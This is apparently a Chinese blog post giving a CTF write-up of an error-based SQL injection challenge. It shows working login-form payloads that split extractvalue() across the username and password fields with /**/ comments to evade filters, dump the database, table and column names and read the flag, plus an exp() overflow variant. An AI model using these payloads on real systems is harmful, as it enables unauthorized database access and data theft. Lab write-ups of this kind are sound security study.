美文网首页
sql注入、报错注入、HPF

sql注入、报错注入、HPF

作者: Hcolehy | 来源:发表于2018-09-07 17:21 被阅读0次

加了料的报错注入

题目地址

思路复现

题目界面文字提示我们post提交username、password。提交username=1&password=1后返回登录失败,两变量分别加'后都返回数据库报错信息,说明都可注入且单引号没有被过滤。查看页面源码由注释提示知,后台验证的sql语句:

select * from users where username='$username' and password='$password'

于是提交username=1'or'1&password=1'or'1返回You are our member, welcome to enter.但这对我们没什么用。考虑报错注入或盲注,测试过滤规则发现# --注释符被过滤() ,在username中被过滤,extractvalue updatexml这些报错函数在password中被过滤。所以要使用报错注入,函数必须写在username中括号逗号写在password中,然后用/**/注释掉sql语句中的and password='

提交

username=1' or extractvalue/*&password=*/(1,concat(0x5c,(select database()))) or'1

成功输出数据库名<br>XPATH syntax error: '\error_based_hpf'这里也可以看出出题人本意也是让我们使用hpf http行内注释。然后依次:

表名:

username=1' or extractvalue/*&password=*/(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema regexp database()))) or '1

列名:

username=1' or extractvalue/*&password=*/(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_name regexp ffll44jj))) or '1

值:

username=1' or extractvalue/*&password=*/(1,concat(0x5c,(select * from ffll44jj))) or'1

可得flag,但是查字段名时遇到了CBC字节翻转那题中同样的问题,报数据库某目录内存不够的错,但可以直接查 * 得字段值。然后查看其他wp,并没有发现类似问题,所以姑且认为是服务器问题?这个问题没有解决但在看别人得wp时发现其他解法。

函数exp()的报错可以注入,但password没有过滤这个函数。

username=1&password=1' or exp(~(select * from ffll44jj)) or '1

关于盲注

由于本题中mid,substr等字符串截取函数均被过滤。所以采用正则表达式匹配,用!<>代替=用regexp ^逐一匹配字符串。盲注详细脚本这里不再多说。

相关文章

  • sql注入、报错注入、HPF

    加了料的报错注入 题目地址 思路复现 题目界面文字提示我们post提交username、password。提交us...

  • sql注入_报错注入

    sql注入报错注入原理解析 先放上几条payload,免费自取~ 如果关键表被禁用: 如果rand()函数被禁用可...

  • sql注入-报错注入

    注入源代码 1.单引号报错 2.order by 判断列数 4.爆数据库

  • 一步一步学习 Web 安全 2.4 union 联合查询注入

    对 SQL 注入有一个大致的了解后,我们再来深入学习。 SQL 注入有联合查询注入、报错注入、布尔盲注、时间盲注等...

  • SQL注入:实施报错注入攻击

    定义 报错注入是一种SQL注入类型,用于使SQL语句报错的语法,用于注入结果无回显但错误信息有输出的情况。返回的错...

  • sql注入-updatexml报错注入

    参考:MySQL updatexml报错注入MySQL updatexml()、extractvalue() 报错...

  • SQL注入-报错注入攻击

    特别声明:该文章只运用于学习安全测试交流之用,请勿用于其他 基础知识准备: MySQL 5.1.5版本中添加了对X...

  • 60.sql注入与xss挑战

    一、sql注入(正常回显)的步骤1.检查注入点——使用'报错——>'引入了查询语句正常——>没有注入点and 1=...

  • web常见漏洞的成因和修复

    1.SQL注入 漏洞描述:SQL 注入攻击( SQL Injection ),简称注入攻击、SQL 注入,主要用于...

  • sql报错注入

    转自:http://www.cnblogs.com/Dleo/p/5493782.html ~全部都以查user(...

网友评论

      本文标题:sql注入、报错注入、HPF

      本文链接:https://www.haomeiwen.com/subject/lhkfgftx.html